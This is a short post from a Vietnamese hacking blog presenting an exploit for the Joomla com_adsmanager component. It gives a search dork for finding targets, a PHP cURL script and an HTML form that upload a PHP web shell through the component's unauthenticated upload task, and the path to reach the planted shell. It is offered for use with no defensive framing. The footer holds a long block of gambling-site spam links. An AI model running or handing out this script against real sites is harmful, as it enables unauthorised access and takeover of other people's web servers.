AnonyViet

No Result

View All Result

No Result

View All Result

No Result

View All Result

Joomla com_adsmanager Exploit

by AnonyViet

in SQL Injection

Reading Time: 1 min read

Dork : inurl:/index.php?option=com_adsmanager/ site:/uk/com/org

Tham gia kênh Telegram của AnonyViet 👉 Link 👈

CODE PHP :

Các bài viết liên quan

Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất 13

Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất

14/05/2017 - Updated on 15/05/2017

Khai thác lỗ hổng Wordpress Plugin WP-Dreamworkgallery 3

Khai thác lỗ hổng WordPress Plugin WP-Dreamworkgallery

01/04/2017 - Updated on 16/12/2020

Hướng dẫn khai thác lỗi CMS Upload Website 2017 10

Hướng dẫn khai thác lỗi CMS Upload Website 2017

11/01/2017 - Updated on 16/12/2020

<?php

$url = "site.com/index.php?option=com_adsmanager&task=upload&tmpl=component"; // put URL Here
$post = array
(
"file" => "@shell.jpg",
"name" => "shell.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;

?>

#CSRF :

<form method="POST" action="TARGET/index.php?option=com_adsmanager&task=upload&tmpl=component"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

Acces Shell: site.com/tmp/plupload/shell.php

Bài viết đạt: 5/5 - (100 bình chọn)

Tags: exploit joomla

AnonyViet

Kiến thức như một ngọn lửa, càng chia sẽ nó sẽ càng bùng cháy!

Related Posts

Danh sách Payload SQL Injection 1

SQL Injection

Danh sách Payload SQL Injection

Cách dùng Burp Suite khai thác SQL Injection 2

SQL Injection

Cách dùng Burp Suite khai thác SQL Injection

Hướng dẫn khai thác lỗi SQL Injection cơ bản 3

Basic Hacking

Hướng dẫn khai thác lỗi SQL Injection cơ bản

sql injection shell

SQL Injection

Sử dụng SQL Injection để chạy lệnh và chiếm quyền Shell

Tool khai thác lỗi SQL Injection với SQLi Dumper v8.2 Full 8

SQL Injection

Download SQLi Dumper v10.1 Full – Tool khai thác lỗi SQL Injection

11/02/2020 - Updated on 16/12/2020

SQLMap v1.2.9 - Công cụ khai thác lỗ hổng SQL Injection mạnh nhất 4

SQL Injection

SQLMap v1.2.9 – Công cụ khai thác lỗ hổng SQL Injection mạnh nhất

11/09/2018 - Updated on 16/12/2020

Next Post

Hướng dẫn Tạo tool hack disconect LoL

Hướng dẫn Tạo tool hack disconect LoL

Subscribe

Website này sử dụng Akismet để hạn chế spam. Tìm hiểu bình luận của bạn được duyệt như thế nào.

1 Comment

oldest

newest

Inline Feedbacks

View all comments

Lâm Trung Tính

6 years ago

Nguyễn Lam để đây không biết chừng nào tới đây..hi..hi

Reply

wpDiscuz

No Result

View All Result

©2023 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ ku11net.link F8BET W88 ST666 https://jun886.net Trực tiếp bóng đá xoilac tv ae888 New 88 new88 Nhà cái New88 uy tín https://vn88.news/ suncity https://hi88g.com/ Dewabet Fun88 SODO CASINO vn88 vc ae3888 sodo casino 79king.cam ee88788.com go88 88online nhà cái Jun88 uy tín Loto88 https://okvip.center/ https://789betket.biz/ https://jun88.land/ Twin xem bong da truc tiep ku11 https://st6667.com/ Nhà Cái PTWIN i9betcom.net NHÀ CÁI UY TÍN 789WIN xem keo nha cai Xoilac tv Vnloto Lucky88 cwin 12BET MNCX Five88 dự đoán xổ số nhacai banca Lode88 6686vni.com Game mobile lodeonline awin681.com 8us Lucky88 Xoso66 onbet 789win 333666.casino 123b com new88 hi88 VN138 nhận định kèo nhà cái sv388bet.cam hitclub.bz 7ball sunwin Kubet1 nohu52.fun https://tdtcblog.club/ http://win79bet.club/ https://sunwin1.in/ QH88 https://kubet77.to https://bongdanet.win/ Jun88 new88788.com tdtc.guru KUBET77 Nhà Cái Uy Tín Onl SM66 bossnhacai.com https://kubet88.gg/ Cubet nhà cái j88